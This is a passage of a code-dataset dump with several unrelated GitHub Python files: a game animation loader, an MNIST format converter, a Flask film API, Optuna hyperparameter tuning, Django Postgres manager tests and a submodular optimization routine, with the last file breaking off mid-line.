self.anim_freq:\r\n anim_index = []\r\n if self.state_range == {}:\r\n anim_index = self.img_indexes\r\n else:\r\n try:\r\n anim_index = self.img_indexes[self.state_range[self.state][0]:self.state_range[self.state][1]]\r\n except KeyError:\r\n return\r\n try:\r\n find_index = anim_index.index(self.img)\r\n if not invert:\r\n if find_index == len(anim_index)-1:\r\n self.index = 0\r\n else:\r\n self.index = find_index+1\r\n else:\r\n if find_index == 0:\r\n self.index = len(anim_index)-1\r\n\r\n else:\r\n self.index = find_index-1\r\n self.img = anim_index[self.index]\r\n except ValueError:\r\n try:\r\n self.index = 0\r\n self.img = anim_index[self.index]\r\n\r\n except IndexError:\r\n pass\r\n self.anim_counter = 0\r\n else:\r\n self.anim_counter += 1\r\n\r\n @staticmethod\r\n def parse_animation(anim_data,obj=None):\r\n anim_type = get_element(anim_data,\"anim_type\")\r\n root_path = get_element(anim_data, \"root_path\")\r\n path_list = get_element(anim_data,\"path_list\")\r\n state_range = get_element(anim_data, \"state_range\")\r\n anim_freq = get_element(anim_data, \"anim_freq\")\r\n if not anim_freq:\r\n anim_freq = CONST.animation_step\r\n anim = None\r\n \r\n '''Check type entry is a string with '.' or alpha'''\r\n if anim_type and isinstance(anim_type, CONST.string_type):\r\n for c in anim_type:\r\n if c != '.' and c != '_' and not c.isalpha():\r\n log(\"Error: Invalid character type for animation type: \"+anim_type,1)\r\n return None\r\n elif anim_type is None:\r\n anim_type = ''\r\n else:\r\n log(\"Error: Invalid type of anim_type, given: \"+type(anim_type),1)\r\n return None\r\n if anim_type is not '':\r\n dir_list = anim_type.split(\".\")\r\n\r\n module_name = \".\".join(dir_list[0:len(dir_list)-1])\r\n class_name = dir_list[len(dir_list)-1]\r\n log(module_name+\" \"+class_name)\r\n try:\r\n exec('''from %s import %s'''%(module_name, class_name ))\r\n except ImportError as e:\r\n log(\"Error while importing \"+anim_type+\" \"+str(e), 1)\r\n return None\r\n \r\n try:\r\n d = locals()\r\n exec('''anim = %s(obj)'''% class_name, globals(), d)\r\n anim = d['anim']\r\n except Exception as e:\r\n log(\"Error initializing animation: \"+str(e), 1)\r\n return None\r\n else:\r\n log(\"Use default animation\")\r\n anim = Animation(obj)\r\n\r\n if anim and root_path:\r\n anim.root_path = root_path\r\n else:\r\n log(\"Error: UNDEFINED anim or root_path is None\",1)\r\n return anim\r\n if path_list and isinstance(path_list,list):\r\n anim.path_list = path_list\r\n if state_range and isinstance(state_range,dict):\r\n anim.state_range = state_range\r\n anim.anim_freq = anim_freq\r\n return anim\r\n def get_screen_pos(self):\r\n return (0,0)","repo_name":"EliasFarhan/GBJam","sub_path":"animation/animation_main.py","file_name":"animation_main.py","file_ext":"py","file_size_in_byte":5215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"26510059222","text":"import numpy as np\n\n# Train Data\nx_train = np.loadtxt('../data/mnist/train.csv',delimiter=',',dtype=np.float64)\ny_train = x_train[:,-1].reshape(-1,1)\nx_train = np.delete(x_train,-1,1)\nx_train /= 255 # Scaling\n\n# Test Data\nx_test = np.loadtxt('../data/mnist/test.csv',delimiter=',',dtype=np.float64)\ny_test = x_test[:,-1].reshape(-1,1)\nx_test = np.delete(x_test,-1,1)\nx_test /= 255 # Scaling\n\nprint(\"Started copying\")\nwith open('../data/mnist/libsvm_train.txt','w') as f:\n for idx in range(x_train.shape[0]):\n f.writelines(\"{0} \".format(y_train[idx][0]))\n _ = [f.writelines(\"{0}:{1} \".format(idy+1,x_train[idx][idy])) for idy in range(x_train.shape[1])]\n f.writelines(\"\\n\")\nprint(\"Finished copying train data\")\n\nwith open('../data/mnist/libsvm_test.txt','w') as f:\n for idx in range(x_test.shape[0]):\n f.writelines(\"{0} \".format(y_test[idx][0]))\n _ = [f.writelines(\"{0}:{1} \".format(idy+1,x_test[idx][idy])) for idy in range(x_test.shape[1])]\n f.writelines(\"\\n\")\nprint(\"Finished copying test data\")","repo_name":"messi313/COL-774-Assignments","sub_path":"Assignment 2/scripts/libsvm_data.py","file_name":"libsvm_data.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"604780939","text":"import os\nimport sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom core import radii_units_colors\nfrom core import get_positions_from_row\n\n\ntry:\n if len(sys.argv) < 2:\n raise OSError(\"Provide an existing data file name from the data/ folder\")\n\n filename = sys.argv[1]\n if not os.path.isfile(f\"data/{filename}\"):\n raise OSError(f\"The file {filename} does not exist. Please provide an existing data file in the data/ folder\")\n\n print(\"Reading file...\")\n positions = pd.read_csv(f\"data/{filename}\", delimiter=\",\")\n print(\"File read.\")\n\n animation_rows = np.linspace(0, len(positions)- 1, 100, dtype=int)\n animation_positions = positions.iloc[animation_rows,:]\n\n for idx, row in animation_positions.iterrows():\n (time, central_x, central_y, moving_x, moving_y, particles_xs, particles_ys) = get_positions_from_row(row)\n\n plt.clf()\n plt.scatter(central_x, central_y, color='b')\n plt.scatter(moving_x, moving_y, color='r')\n for idx, (radius, num, color) in enumerate(radii_units_colors):\n plt.scatter(particles_xs[idx], particles_ys[idx], s=1, color=color, label=rf\"$r = {radius}$\")\n \n plt.xlim([-100, 100])\n plt.ylim([-100, 100])\n plt.title(time)\n plt.pause(0.01)\n \nexcept OSError as e:\n print(repr(e))","repo_name":"yijerjer/NBodySimulation","sub_path":"script submit/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26170293389","text":"from flask import Flask\nfrom flask_restful import Api, Resource, reqparse, abort, fields, marshal_with\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import exc\n\n\n\n#Create the FlasK App\napp = Flask(__name__)\n#Create the API wrapper and pass the app to it \napi = Api(app) \n#Create the Database object and initialise it with app\ndb = SQLAlchemy(app)\n\n\n#Define the app configs for SQL Alchemy\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///film_database.db\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = True\n\n#Create the database Model\nclass Film(db.Model):\n \"\"\"\n The database to store the films\n \"\"\"\n __tablename__ = \"films\"\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(80), nullable=False)\n director = db.Column(db.String(80), nullable=False)\n rating = db.Column(db.Integer, nullable=False)\n\n def __repr__(self):\n return f\"\"\n\n#Configure the Database, comment as necessary\n#db.drop_all()\n#db.create_all()\n\n#Create the PUT Request Parser object\nfilm_put_args = reqparse.RequestParser()\n#Define the paramaters to parse requests for, extracted data will be stored in parse_args()\nfilm_put_args.add_argument(\"title\", type=str, help='You must specify the Title of the film!', required =True)\nfilm_put_args.add_argument(\"director\", type=str, help='You must specify the Director of the film!', required=True)\nfilm_put_args.add_argument(\"rating\", type=int, help='You must specify the Rating of the film, 1 - 10!', required = True)\n\n#Create the UPDATE Request Parser object\nfilm_update_args = reqparse.RequestParser()\n#Define the paramaters to parse requests for, extracted data will be stored in parse_args(). Do not make all required\nfilm_update_args.add_argument(\"title\", type=str, help='You must specify the Title of the film!')\nfilm_update_args.add_argument(\"director\", type=str, help='You must specify the Director of the film!')\nfilm_update_args.add_argument(\"rating\", type=int, help='You must specify the Rating of the film, 1 - 10!')\n\n#Create the Resource field to serialize the db data object into JSON \nresource_fields = {\n \"id\" : fields.Integer,\n \"title\" : fields.String,\n \"director\" : fields.String,\n \"rating\" : fields.Integer\n}\n\n\n#Create a resource for the API\nclass Film_db(Resource):\n \"\"\"\n The Film Resource for the API \n \"\"\"\n #use the decorator to serialize the returned data\n @marshal_with(resource_fields)\n def get(self, film_id):\n #Query the DB for the film date depending on the film_id provided\n output = Film.query.filter_by(id=film_id).first()\n if output:\n return output, 200\n else: \n abort(404, message =\"There is no film with the ID \" + str(film_id))\n \n \n def put(self, film_id):\n #Try and catch the put attempt\n try:\n #the parse_args() method searches the request for the criteria in the add_argument statements above\n args = film_put_args.parse_args() \n #Add the args to the model object then commit the changes\n put_film = Film(id=film_id, title=args['title'], director=args['director'], rating=args['rating'])\n db.session.add(put_film)\n db.session.commit()\n return {\"message\":\"Your film has been added!\"}, 201 #Return a success message and an HTTP code\n #IF the fim_id is not found send an error message\n except exc.IntegrityError:\n abort(409, message =\"A film with the ID \" + str(film_id) + \" already exists in the database. Please use a different ID\")\n\n\n #use the decorator to serialize the returned data \n @marshal_with(resource_fields)\n def patch(self, film_id):\n #Create the argument object\n args = film_update_args.parse_args()\n #create the Model object\n output = Film.query.filter_by(id=film_id).first()\n #Abort if there is nothing to update\n if not output:\n abort(404, message =\"A film with the ID \" + str(film_id) + \" does not exist in the database. Please use a different ID\")\n #chek if the args attributes are not None\n if args[\"title\"]:\n output.title = args[\"title\"]\n if args[\"director\"]:\n output.director = args[\"director\"]\n if args[\"rating\"]:\n output.rating = args[\"rating\"]\n #commit the changes to the Database\n db.session.commit()\n #return the info to the user\n return output, 200\n\n\n def delete(self, film_id):\n #find the film to be deleted\n output = Film.query.filter_by(id=film_id).first()\n if output:\n #delete the film and commit the changes\n db.session.delete(output)\n db.session.commit()\n #return a success message and an HTTP code\n return {\"message\":\"Your film has been deleted!\"}, 200\n else:\n #IF the fim_id is not found send an error message \n abort(404, message =\"A film with the ID \" + str(film_id) + \" does not exist in the database. Please use a different ID\")\n\n\n#link the resource with the URL string and the dynamic value\napi.add_resource(Film_db, \"/film/\")\n\n\n#If this file is executed, not imported, run the application\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"Robzabel/Flask_API_Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"984996233","text":"import pandas as pd\nimport os\n\nos.chdir(\"/home/choiboy9106/Desktop/Metis/Project McNulty\")\n\nweatherdf = pd.read_csv(\"weather.csv\")\nsp500df = pd.read_csv(\"sp500.csv\")\nsolardf = pd.read_csv(\"solar.csv\")\n\ndf = pd.merge(weatherdf, solardf, on = \"Date\")\ndel df[\"Unnamed: 0\"]\ndf = pd.merge(df, sp500df, on = \"Date\")\nprint(df)\ndel df[\"Unnamed: 0\"]\ndf.to_csv(\"all.csv\")\n\n\nweatherdf = pd.read_csv(\"weather.csv\")\nvixdf = pd.read_csv(\"vix.csv\")\nsolardf = pd.read_csv(\"solar.csv\")\n\ndf = pd.merge(weatherdf, solardf, on = \"Date\")\ndel df[\"Unnamed: 0\"]\ndf = pd.merge(df, vixdf, on = \"Date\")\nprint(df)\ndel df[\"Unnamed: 0\"]\ndf.to_csv(\"all2.csv\")\n","repo_name":"sanghumchoi/weather_stock_analysis","sub_path":"dfmerge.py","file_name":"dfmerge.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30661608926","text":"import optuna\nimport pandas as pd\nimport torch\nimport torch.optim as optim\n\nimport src.AutoRec_trainer as autorec_trainer\nimport src.MF_trainer as mf_trainer\nimport src.VAE_trainer as vae_trainer\nfrom src.data import get_data\nfrom src.loss import mrr\nfrom src.models import get_model\n\n\ndef train(model_name, model, optimizer, epochs, dl_train, dl_test, device, dataset_name, mrr_threshold=4):\n \"\"\"\n Execute the proper trainer with the right model, optimizer and relevant data loaders.\n \"\"\"\n loss = None\n if model_name == 'MF':\n loss = mf_trainer.train_mf(\n model=model, optimizer=optimizer, max_epochs=epochs, early_stopping=3,\n dl_train=dl_train, dl_test=dl_test, device=device, dataset_name=dataset_name, mrr_threshold=mrr_threshold)\n elif model_name == 'AutoRec':\n loss = autorec_trainer.train_autorec(\n model=model, optimizer=optimizer, max_epochs=epochs, early_stopping=3,\n dl_train=dl_train, dl_test=dl_test, device=device, dataset_name=dataset_name, mrr_threshold=mrr_threshold)\n elif model_name == 'VAE':\n loss = vae_trainer.train_vae(\n model=model, optimizer=optimizer, max_epochs=epochs, early_stopping=3,\n dl_train=dl_train, dl_test=dl_test, device=device, dataset_name=dataset_name, mrr_threshold=mrr_threshold)\n return loss, model\n\n\ndef tune_params(model_name, dataset_name, n_trials, max_epochs, device, mrr_threshold=4):\n \"\"\"\n Use the Optuna package for hyperparameters tuning.\n - Define the ranges for the relevant hyperparameters\n - Sample different hyperparameters combinations using RandomSampler (can be changed)\n - Train the model using the sample and keep the validation loss.\n After many trials, decide on the best hyperparameters and return both the trials results and the entire study.\n \"\"\"\n\n def objective(trial):\n if model_name == 'MF':\n params = {\n # 'learning_rate': trial.suggest_loguniform('learning_rate', 1e-5, 1e-1),\n 'learning_rate': trial.suggest_categorical('learning_rate', [0.001, 0.01, 0.1, 1]),\n 'optimizer': trial.suggest_categorical(\"optimizer\", [\"SGD\"]),\n # 'optimizer': trial.suggest_categorical(\"optimizer\", [\"Adam\", \"RMSprop\", \"SGD\"]),\n # 'latent_dim': trial.suggest_int(\"latent_dim\", 10, 20),\n 'latent_dim': trial.suggest_categorical(\"latent_dim\", [10, 40, 100, 300, 500]),\n 'batch_size': trial.suggest_categorical(\"batch_size\", [512])\n }\n elif model_name == 'AutoRec':\n params = {\n # 'learning_rate': trial.suggest_loguniform('learning_rate', 1e-5, 1e-1),\n 'learning_rate': trial.suggest_categorical('learning_rate', [0.001, 0.01, 0.1, 1]),\n # 'optimizer': trial.suggest_categorical(\"optimizer\", [\"Adam\", \"RMSprop\", \"SGD\"]),\n 'optimizer': trial.suggest_categorical(\"optimizer\", [\"RMSprop\"]),\n # 'optimizer': trial.suggest_categorical(\"optimizer\", [\"RMSprop\"]),\n # 'latent_dim': trial.suggest_int(\"latent_dim\", 10, 20),\n 'latent_dim': trial.suggest_categorical(\"latent_dim\", [10, 40, 100, 300, 500]),\n 'batch_size': trial.suggest_categorical(\"batch_size\", [512])\n }\n elif model_name == 'VAE':\n params = {\n 'learning_rate': trial.suggest_categorical('learning_rate', [0.0001, 0.001, 0.01, 0.1]),\n 'activation_func': trial.suggest_categorical('activation_func', ['tanh', 'relu', 'selu']),\n 'p_dims': trial.suggest_categorical('p_dims', [[200, 600], [250, 500]]),\n 'optimizer': trial.suggest_categorical(\"optimizer\", [\"Adam\", \"RMSprop\", \"SGD\"]),\n 'dropout': trial.suggest_float('dropout', 0.2, 0.5),\n 'batch_size': trial.suggest_categorical(\"batch_size\", [128, 256, 512])\n }\n\n # params = params_dict[dataset_name][model_name] # Get the relevant params range by the dataset and model\n dl_train, dl_valid, _, _ = get_data(\n model_name=model_name, dataset_name=dataset_name, batch_size=params['batch_size'], device=device)\n model = get_model(model_name, params, dl_train) # Build model\n optimizer = getattr(optim, params['optimizer'])(\n model.parameters(), lr=params['learning_rate']) # Instantiate optimizer\n valid_loss, _ = train(model_name, model, optimizer, max_epochs, dl_train, dl_valid, device,\n dataset_name, mrr_threshold=mrr_threshold) # Train the model and calc the validation loss\n\n return valid_loss\n\n study = optuna.create_study(\n direction=\"minimize\", sampler=optuna.samplers.RandomSampler()) # Build the study\n # Optimize (the actual tuning process)\n study.optimize(objective, n_trials=n_trials)\n # Extract the trials information as Pandas DataFrame\n df_trials_results = study.trials_dataframe()\n\n return study, df_trials_results\n\n\ndef calc_final_mrr(model_name, model, dl_test, mrr_threshold=4):\n \"\"\"\n Calculate the final MRR score for the fully trained model.\n Based on the model type, extract the entire test set, \n evaluate it with the trained model and calculate the MRR score.\n \"\"\"\n if model_name == 'MF':\n test_users, test_items, y_test = dl_test.dataset.get_all_data()\n\n # Generate predictions\n model.eval()\n with torch.no_grad():\n y_preds = model(test_users, test_items)\n\n # Prepare full rating matrixs for the MRR calculation\n # True rating matrix\n test_users = torch.clone(test_users.detach()).to('cpu')\n test_items = torch.clone(test_items.detach()).to('cpu')\n y_test = torch.clone(y_test.detach()).to('cpu')\n df_true = pd.DataFrame(\n {'user_id': test_users, 'item_id': test_items, 'rating': y_test})\n ratings_true = df_true.pivot(\n index='user_id', columns='item_id', values='rating').fillna(0)\n # Predicted rating matrix\n y_preds = torch.clone(y_preds.detach()).to('cpu')\n df_preds = pd.DataFrame(\n {'user_id': test_users, 'item_id': test_items, 'rating': y_preds})\n ratings_preds = df_preds.pivot(\n index='user_id', columns='item_id', values='rating').fillna(0)\n mrr_ = mrr(pred=ratings_preds.values, actual=ratings_true.values,\n cutoff=5, mrr_threshold=mrr_threshold)\n else: # AutoRec & VAE\n x = y_test = dl_test.dataset.get_all_data()\n # Generate predictions\n model.eval()\n with torch.no_grad():\n y_preds = model(x)\n\n # In AutoRec & VAE the predictions are already in the shape of rating matrixs so no need in processing\n if model_name == 'AutoRec':\n mrr_ = mrr(pred=y_preds.cpu().numpy(), actual=y_test.cpu(\n ).numpy(), cutoff=5, mrr_threshold=mrr_threshold)\n elif model_name == 'VAE':\n mrr_ = mrr(pred=y_preds[0].cpu().numpy(), actual=y_test.cpu(\n ).numpy(), cutoff=5, mrr_threshold=mrr_threshold)\n\n return mrr_\n\n\ndef final_train(model_name, dataset_name, best_params, max_epochs, device, mrr_threshold=4):\n \"\"\"\n After we optimized and choosed the best hyperparameters for the model we want to prepare it for predicting the test set.\n - Use the best hyperparameters to build the final model\n - Train the final model on the train+validation data sets (full_train)\n - Test it against the test set for final results\n \"\"\"\n _, _, dl_test, dl_full_train = get_data(\n model_name=model_name, dataset_name=dataset_name, batch_size=best_params['batch_size'], device=device)\n model = get_model(model_name, best_params, dl_full_train) # Build model\n optimizer = getattr(optim, best_params['optimizer'])(\n model.parameters(), lr=best_params['learning_rate']) # Instantiate optimizer\n # Train the model on the full_train (train+valid) set and calc the test loss\n test_loss, final_model = train(model_name, model, optimizer, max_epochs,\n dl_full_train, dl_test, device, dataset_name, mrr_threshold=mrr_threshold)\n\n mrr_ = calc_final_mrr(model_name=model_name, model=final_model,\n dl_test=dl_test, mrr_threshold=mrr_threshold)\n\n return test_loss, final_model, mrr_\n\n\n# Only for testing\nif __name__ == '__main__':\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n dataset_name = 'books'\n max_epochs = 2\n n_trials = 2\n mrr_threshold = 8\n model_name = 'VAE' # 'AutoRec' # 'MF' # \"VAE\"\n\n study_ml, df_tuning_results = tune_params(\n model_name=model_name,\n dataset_name=dataset_name,\n max_epochs=max_epochs,\n n_trials=n_trials,\n device=device,\n mrr_threshold=mrr_threshold\n )\n\n best_params = study_ml.best_params\n print(f'Best params: {best_params}')\n print(df_tuning_results.sort_values(by='value').head(15))\n\n # Full train\n test_loss, final_model, test_mrr = final_train(\n model_name=model_name,\n dataset_name=dataset_name,\n best_params=best_params,\n max_epochs=max_epochs,\n device=device\n )\n print(f'Final test loss = {test_loss}\\nFinal test MRR = {test_mrr}')\n","repo_name":"GuyAttia/MSC-RecSys-Project","sub_path":"src/hyperparams_tuning.py","file_name":"hyperparams_tuning.py","file_ext":"py","file_size_in_byte":9354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12914511387","text":"import os.path\nimport sys\nimport argparse\n\nfrom scannerpy import Database, Job\nfrom scannerpy import ProtobufGenerator, Config\n\narg_parser = argparse.ArgumentParser(\n description='Perform SIFT extraction on input images.')\narg_parser.add_argument('--scanner_config', dest='scanner_config',\n help='the path to the scanner config file')\narg_parser.add_argument('--input_table', dest='input_table', default='frames',\n help='the input table where the frames and frame ids are stored')\narg_parser.add_argument('--output_table', dest='output_table',\n help='the name of the output table', default='extraction')\narg_parser.add_argument(\n '--packet_size', dest='packet_size', type=int, default=25, help='the number of frames to dispatch to each extraction kernel')\nargs = arg_parser.parse_args()\n\ndb = Database(config_path=args.scanner_config)\n\ncwd = os.path.dirname(os.path.abspath(__file__))\ndb.load_op(\n os.path.join(cwd, 'op_cpp/build/libextraction_op.so'),\n os.path.join(cwd, 'op_cpp/build/siftExtraction_pb2.py'))\n\nimage_ids = db.sources.Column()\nframes = db.sources.FrameColumn()\n\n# run SIFT extractions\nkeypoints, descriptors, cameras = db.ops.SiftExtraction(\n image_ids=image_ids, frames=frames)\n\noutput = db.sinks.Column(\n columns={'image_id': image_ids, 'keypoints': keypoints, 'descriptors': descriptors, 'camera': cameras})\n\njob = Job(op_args={\n image_ids: db.table(args.input_table).column('image_id'),\n frames: db.table(args.input_table).column('frame'),\n output: args.output_table})\n\noutput_tables = db.run(output, [job], force=True,\n io_packet_size=args.packet_size, work_packet_size=args.packet_size)\nprint(db.summarize())\n","repo_name":"garyjyzhang/scanner-colmap","sub_path":"integration/extraction.py","file_name":"extraction.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6008982874","text":"from handle_missing_values import MissingValues\r\nfrom handle_outliers import Outliers\r\n\r\nclass CleanDataPipeline:\r\n def __init__(self,data):\r\n self.data = data \r\n\r\n def getContinousVars(self):\r\n continous_variables = []\r\n for col in self.data.columns:\r\n if len(self.data[col].value_counts().to_list())>50 and col!='Id':\r\n continous_variables.append(col)\r\n \r\n return continous_variables\r\n\r\n def runCleanPipeline(self):\r\n missingvalues = MissingValues(self.data)\r\n outliers = Outliers(self.data)\r\n filledMissingValues_df = missingvalues.fillMissingValues(self.data)\r\n removed_outliers_df = outliers.removeOutliers(dataframe=filledMissingValues_df, continous_variables=self.getContinousVars())\r\n\r\n return removed_outliers_df\r\n","repo_name":"shubh2016shiv/probability-of-default-prediction","sub_path":"clean_data_pipeline.py","file_name":"clean_data_pipeline.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4216679038","text":"import pytest\n\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.db import models\nfrom django.test import override_settings\n\nfrom psqlextra.manager import PostgresManager\nfrom psqlextra.models import PostgresModel\n\nfrom .fake_model import get_fake_model\n\n\n@pytest.mark.parametrize(\n \"databases\",\n [\n {\"default\": {\"ENGINE\": \"psqlextra.backend\"}},\n {\n \"default\": {\"ENGINE\": \"django.db.backends.postgresql\"},\n \"other\": {\"ENGINE\": \"psqlextra.backend\"},\n },\n {\n \"default\": {\"ENGINE\": \"psqlextra.backend\"},\n \"other\": {\"ENGINE\": \"psqlextra.backend\"},\n },\n ],\n)\ndef test_manager_backend_set(databases):\n \"\"\"Tests that creating a new instance of :see:PostgresManager succeseeds\n without any errors if one or more databases are configured with\n `psqlextra.backend` as its ENGINE.\"\"\"\n\n with override_settings(DATABASES=databases):\n assert PostgresManager()\n\n\ndef test_manager_backend_not_set():\n \"\"\"Tests whether creating a new instance of\n :see:PostgresManager fails if no database\n has `psqlextra.backend` configured\n as its ENGINE.\"\"\"\n\n with override_settings(\n DATABASES={\"default\": {\"ENGINE\": \"django.db.backends.postgresql\"}}\n ):\n with pytest.raises(ImproperlyConfigured):\n PostgresManager()\n\n\ndef test_manager_truncate():\n \"\"\"Tests whether truncating a table works.\"\"\"\n\n model = get_fake_model({\"name\": models.CharField(max_length=255)})\n\n model.objects.create(name=\"henk1\")\n model.objects.create(name=\"henk2\")\n\n assert model.objects.count() == 2\n model.objects.truncate()\n assert model.objects.count() == 0\n\n\n@pytest.mark.django_db(transaction=True)\ndef test_manager_truncate_cascade():\n \"\"\"Tests whether truncating a table with cascade works.\"\"\"\n\n model_1 = get_fake_model({\"name\": models.CharField(max_length=255)})\n\n model_2 = get_fake_model(\n {\n \"name\": models.CharField(max_length=255),\n \"model_1\": models.ForeignKey(\n model_1, on_delete=models.CASCADE, null=True\n ),\n }\n )\n\n obj_1 = model_1.objects.create(name=\"henk1\")\n model_2.objects.create(name=\"henk1\", model_1_id=obj_1.id)\n\n assert model_1.objects.count() == 1\n assert model_2.objects.count() == 1\n\n model_1.objects.truncate(cascade=True)\n\n assert model_1.objects.count() == 0\n assert model_2.objects.count() == 0\n\n\ndef test_manager_truncate_quote_name():\n \"\"\"Tests whether the truncate statement properly quotes the table name.\"\"\"\n\n model = get_fake_model(\n {\"name\": models.CharField(max_length=255)},\n PostgresModel,\n {\n # without quoting, table names are always\n # lower-case, using a capital case table\n # name requires quoting to work\n \"db_table\": \"MyTable\"\n },\n )\n\n model.objects.create(name=\"henk1\")\n model.objects.create(name=\"henk2\")\n\n assert model.objects.count() == 2\n model.objects.truncate()\n assert model.objects.count() == 0\n","repo_name":"SectorLabs/django-postgres-extra","sub_path":"tests/test_manager.py","file_name":"test_manager.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","stars":647,"dataset":"github-code","pt":"72"} +{"seq_id":"15973280999","text":"import warnings\nfrom typing import Set, TypeVar, Tuple, Iterable\n\nfrom submodmax.value_reuse.abstract_optimizer import AbstractSubmodularFunctionValueReuse, AbstractOptimizerValueReuse, FuncInfo\nfrom submodmax.value_reuse.set_info import SetInfo\n\nE = TypeVar('E')\n\n\nclass AbstractDoubleGreedySearchValueReuse(AbstractOptimizerValueReuse):\n \"\"\"\n Parent class for Deterministic and\n Randomized Unconstrained submodular maximization, by Buchbinder and Feldman\n\n See also:\n Buchbinder, N., Feldman, M., Naor, J. S., & Schwartz, R. (2015).\n A tight linear time (1/2)-approximation for unconstrained submodular maximization.\n SIAM Journal on Computing, 44(5), 1384–1402. https://doi.org/10.1137/130929205\n\n \"\"\"\n\n def __init__(self, objective_function: AbstractSubmodularFunctionValueReuse, ground_set: Set[E],\n debug: bool = True):\n super().__init__(objective_function, ground_set, debug)\n\n self.class_name = 'submodmax.value_reuse.AbstractDoubleGreedySearch'\n\n def should_update_X(self, a: float, b: float) -> bool:\n raise NotImplementedError('abstract method')\n\n def ground_set_iterator(self) -> Iterable[E]:\n raise NotImplementedError('abstract method')\n\n def optimize(self) -> Tuple[SetInfo, FuncInfo]:\n if self.debug:\n print(\"=====================================================================\")\n print(\"START\", self.class_name, \"optimizer\")\n print(\"=====================================================================\")\n ground_set_size = len(self.ground_set)\n empty_set = set()\n\n X_prev_set_info: SetInfo = SetInfo(\n ground_set_size=ground_set_size,\n current_set_size=0,\n added_elems=empty_set,\n deleted_elems=empty_set,\n intersection_previous_and_current_elems=empty_set\n )\n X_prev_set_info.set_current_set(set())\n\n Y_prev_set_info = SetInfo(\n ground_set_size=ground_set_size,\n current_set_size=ground_set_size,\n added_elems=self.ground_set,\n deleted_elems=empty_set,\n intersection_previous_and_current_elems=empty_set\n )\n Y_prev_set_info.set_current_set(self.ground_set.copy())\n\n func_info_X_prev: FuncInfo = self.objective_function.evaluate(X_prev_set_info, previous_func_info=None)\n func_info_Y_prev: FuncInfo = self.objective_function.evaluate(Y_prev_set_info, previous_func_info=None)\n\n if self.debug:\n print(\"initialization:\")\n print(\"X0 : size: \", X_prev_set_info.current_set_size, \"/\", ground_set_size, \", f(S): \",\n func_info_X_prev.func_value)\n print(\"Y0: size: \", Y_prev_set_info.current_set_size, \"/\", ground_set_size, \", f(S): \",\n func_info_Y_prev.func_value)\n\n elem: E\n for i, elem in enumerate(self.ground_set_iterator(), 1):\n\n singleton_set: Set[E] = {elem}\n\n # X_prev_plus_elem: Set[E] = X_prev | {elem}\n X_prev_plus_elem_set_info = SetInfo(\n ground_set_size=ground_set_size,\n current_set_size=X_prev_set_info.current_set_size + 1,\n added_elems=singleton_set,\n deleted_elems=empty_set,\n intersection_previous_and_current_elems=X_prev_set_info.current_set\n )\n\n func_info_X_prev_plus_elem: FuncInfo = self.objective_function.evaluate(\n X_prev_plus_elem_set_info, func_info_X_prev)\n a: float = func_info_X_prev_plus_elem.func_value - func_info_X_prev.func_value\n\n Y_prev_minus_elem_set: Set[E] = Y_prev_set_info.current_set - {elem}\n Y_prev_minus_elem_set_info = SetInfo(\n ground_set_size=ground_set_size,\n current_set_size=Y_prev_set_info.current_set_size - 1,\n added_elems=empty_set,\n deleted_elems=singleton_set,\n intersection_previous_and_current_elems=Y_prev_minus_elem_set\n )\n Y_prev_minus_elem_set_info.set_current_set(Y_prev_minus_elem_set)\n func_info_Y_prev_minus_elem = self.objective_function.evaluate(\n Y_prev_minus_elem_set_info, func_info_Y_prev)\n b: float = func_info_Y_prev_minus_elem.func_value - func_info_Y_prev.func_value\n\n if self.debug:\n print()\n print(\"element \", i, \"/\", ground_set_size)\n print(\"\\t X_prev --> size: \", X_prev_set_info.current_set_size, \", f(S):\",\n func_info_X_prev.func_value)\n print(\"\\t X\" + str(i) + \" + e\" + str(i) + \" --> size: \", X_prev_plus_elem_set_info.current_set_size,\n \", f(S):\",\n func_info_X_prev_plus_elem.func_value)\n print()\n print(\"\\t Y_prev --> size: \", Y_prev_set_info.current_set_size, \", f(S):\",\n func_info_Y_prev.func_value)\n print(\"\\t Y\" + str(i) + \" - e\" + str(i) + \" --> size: \", Y_prev_minus_elem_set_info.current_set_size,\n \", f(S):\",\n func_info_Y_prev_minus_elem.func_value)\n\n if self.should_update_X(a, b):\n\n new_set = X_prev_set_info.current_set | singleton_set\n X_prev_plus_elem_set_info.set_current_set(new_set)\n X_prev_set_info = X_prev_plus_elem_set_info\n\n func_info_X_prev = func_info_X_prev_plus_elem\n # Y_prev stays the same\n if self.debug:\n print(\"\\tX_prev --> size:\", X_prev_set_info.current_set_size, \", f(X_prev):\",\n func_info_X_prev.func_value)\n else:\n # X_prev stays the same\n Y_prev_set_info = Y_prev_minus_elem_set_info\n func_info_Y_prev = func_info_Y_prev_minus_elem\n if self.debug:\n print(\"\\tY_prev --> size:\", Y_prev_set_info.current_set_size, \", f(Y_prev):\",\n func_info_Y_prev.func_value)\n\n warnings.warn(\"remove equality check\")\n if not X_prev_set_info.current_set == 